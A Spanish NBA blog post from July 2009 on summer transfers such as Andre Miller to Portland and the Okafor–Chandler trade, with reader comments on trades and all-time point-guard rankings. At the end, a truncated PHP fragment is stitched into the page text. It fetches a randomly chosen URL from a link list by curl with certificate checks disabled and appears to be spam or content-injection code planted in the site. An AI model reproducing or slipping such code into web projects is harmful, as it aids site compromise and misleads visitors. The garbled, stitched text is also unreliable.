Y el mercado se mueve

29 de July de 2009 por txusma

Este está resultando, sin duda, uno de los veranos más entretenidos a nivel de movimientos en el mercado de la NBA. Tras los fichajes de Shaq por los Cavs, el intercambio entre Ariza y Artest, la llegada de Marion a los Mavs y de Rasheed Wallace a los Celtics se han producido otros traspasos y fichajes la mar de interesantes que no podemos dejar de analizar.

Andre Miller, tras pasar 3 temporadas en los Sixers, abandona Philadelphia para recalar en los Blazers. A pesar de que la necesidad de un base de garantías en la franquicia de Oregon era evidente no parecía ser una de las prioridades de Nate McMillan. De hecho, en unas declaraciones a finales de la temporada decía que intentaría añadir más músculo al equipo. Tras el intento fallido de Turkoglu (¿músculo?) se hace con los servicios de un base hiper-regular y de calidad altamente contrastada (pero de nuevo, poquito músculo). Lo malo, lo extraño, lo ilógico es que McMillan, tan querido por estos lares por sus decisiones a veces extravagantes, ha declarado que piensa continuar con Steve Blake como base titular. El sabrá…

Y en el otro movimiento estrella de los últimos días, Bobcats y Thunder han intercanviado a sus pívots titulares, Emeka Okafor y Tyson Chandler. Ambos son centers eminentemente defensivos pero parece fuera de toda duda que ofensivamente el ex de los Huskies es superior a Chandler. Este sufrirá no tener jugando a su lado a un super clase como Chris Paul, que le proporcionaba, posiblemente, 6 de los 10 puntos que promediaba en Oklahoma New Orleans.

Y no se acaban los movimientos aquí:

Zach Randolph ha sido traspasado a los Grizzlies donde jugará al lado de OJ Mayo y Rudy Gay. Imposible que hayan balones para todos.
David Andersen, ex pívot del Barça, ha sido fichado por los Rockets para cubrir la baja de Yao Ming que estará fuera toda la temporada.
– Los Clippers se han hecho con los servicios de Sebastian Telfair y Craigh Smith procedentes de los Wolves. Si Ricky acabará por no ir a la NBA, Jonny Flynn tendría minutos para dar y tomar.
Jarrett Jack se va a los Raptors, Earl Watson a los Pacers, Jamario Moon a los Cavs, Theo Ratliff a los Spurs y Chris Wilcox a los Pistons.
– Sacramento Kings ha decidido dar una oportunidad a Sean May. Definitivamente será la última para este jugador tan castigado por las lesiones.

Comenta

9 comentarios a esta entrada

  1. Noname dice:
    #1

    Oklahoma??

    Se avecina una temporada incluso mas interesante que la anterior. Si Odom no renobase con los lakers, quien pensais que podria llegar como refuerzo?

    salud0s

      Citar

  2. Óscar dice:
    #2

    Complicado lo vería para LAL si no sigue Odom, y los mejores “cuatros” que eran agentes libres ya están fichados o renovados: Millsap, Boozer, Bass, Gooden o May. El poco margen salarial que tienen tampoco les ayuda. Si no le nenuevan, la rotación interior no sería la de un equipo que aspirase a todo. Pero yo creo que al final seguirá….veremos.
    El cambio Chandler-Okafor es muy interesante para los dos, pero Tyson está bajo sospecha en cuanto a las lesiones desde el traspaso frustrado con OKC en Febrero, cuando no superó el examen médico por las rodillas… A ver cómo le sale la jugada a MJ y Larry Brown, porque en Okafor tenían un valor seguro, un center de los que no sobran hoy en día en la NBA.

      Citar

  3. Héctor dice:
    #3

    Yo el cambio de Okafor por Chandler no termino de entenderlo. Por si os interesa he hablado de ello en mi blog

    http://5contra5.blogspot.com/2009/07/el-traspaso-que-nadie-entiende.html

    Saludos.

      Citar

  4. pcerezo dice:
    #4

    Buenos días,

    André Miller es justo la pieza que todos, con dos dedos de frente, reclamaban para los Blazers, a saber, un base veterano y este tío lo es y además muy por encima de la media.

    Yo interpreto el cambio de Okafor como un intento de dar un giro a la franquicia por que con este tío los Bobcats no han cumplido expectativas. Está claro que tiene más opciones Okafor que Chandler pero no es alguien alrededor del cual puedas construir algo grande.

    Una pena lo del chino. Qué mala suerte lo de Houston. Podrían haber hecho algo grande con lo que tienen y Adelman en el banquillo.

    Zach Randolph a los Grizzlies. Joder, no sé si reír o llorar. A ver quién se tira los trastos antes a la cabeza…

    Un saludo,
    Pablo

      Citar

  5. Óscar dice:
    #5

    Confirmado: Odom sigue en los Lakers. Y también parece seguro que Portland no fichará a nadie más, por lo que Rudy seguirá con muchos minutos, o incluso más.
    La última: “chocolate blanco” puede volver a Memphis, que tienen a Conley, Jaric, y han fichado a Marcus Willams (interesante) para el puesto de base. Y luego dejan escapar a Warrick (MIL), como si cualquier cosa… Lo de los Grizzlies es, cuanto menos, sorprendente, y con Randolph y cía va a ser de nuevo una jaula de grillos…

      Citar

  6. toni dice:
    #6

    Ansiada noticia la renovación de Odom, era muy importante. Ahora solo faltaria encontrar un trade correcto para facturar a farmar con gente como Mbenga o Morrison (que puede ser aprovechable si esta bien) con el objetivo de encontrar un base joven y de garantías.
    La última es que Chocolate Blanco tiene una oferta de los knicks. Si llega a buen puerto, yo sería el primero en levantarme a ver los knicks.

    Los lakers jugarán un amistoso en barcelona contra el Regal. Cuando las entradas se pongan a la venta, si alguien se entera, que lo diga por favor. Gracias.

    Por cierto, ahora os toca el ranking de Bases, ¿que tal lo llevais?
    Tengo muchas ganas de verlo.

      Citar

  7. Txusma dice:
    #7

    No tardara mucho en salir.
    Se aceptan apuestas para el TOP-3

      Citar

  8. Óscar dice:
    #8

    Mi top-3: Oscar Robertson, Magic y Maravich. (Si acierto el orden, soy un monstruo)
    Yo voy a reservar entradas para el R.Madrid-Utah, las podéis conseguir en entradas.com, desde 20 ó 35 € las más baratas. Es el Jue.8 de octubre en el Palacio.
    No me pierdo a Deron Williams en directo, qué espectáculo…. Korver y Okur tirando de 8 metros…Boozer, Millsap, Miles, Brewer, Harpring dando cera… y el Madrid de Messina.

      Citar

  9. Óscar dice:
    #9

    En cuanto a la lista de bases (point guards), el problema es determinar si jugadores como Monroe, Iverson o Maravich los consideramos como bases o escoltas.
    Ahí va mi top-10, que no será el mismo que el vuestro, sin incluir a Monroe ni Iverson (escoltas), pero sí a Maravich, como vosotros: 1/Oscar Robertson 2/Magic Johnson 3/Pete Maravich 4/Bob Cousy 5/John Stockton 6/Steve Nash 7/Walt Frazier 8/Nate Archibald 9/Jason Kidd 10/Isiah Thomas (o KC Jones).
    Me imagino que pondéis a Magic de primero, pero lo mío por mi tocayo es devoción, y los números asustan.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>